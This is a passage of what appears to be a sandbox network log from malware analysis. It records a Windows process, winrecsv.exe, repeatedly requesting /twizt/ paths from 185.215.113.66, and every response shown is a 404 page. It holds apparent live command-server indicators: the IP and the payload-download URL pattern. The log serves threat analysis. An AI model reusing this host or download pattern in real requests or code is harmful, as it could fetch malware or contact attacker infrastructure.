                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:57.197448969 CEST1127OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:57.253489017 CEST1128INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:57 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:58.258836985 CEST1128OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:58.314960003 CEST1129INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:59.323095083 CEST1129OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:59.382657051 CEST1130INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:00.581275940 CEST1130OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:00.640603065 CEST1131INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:00 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.749787185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:05.406146049 CEST1138OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:05.462749958 CEST1139INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:05 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:06.478008986 CEST1146OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:06.550353050 CEST1147INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:06 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:07.556500912 CEST1168OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:07.613881111 CEST1169INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:07 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:08.618907928 CEST3975OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:08.677377939 CEST3976INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:08 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
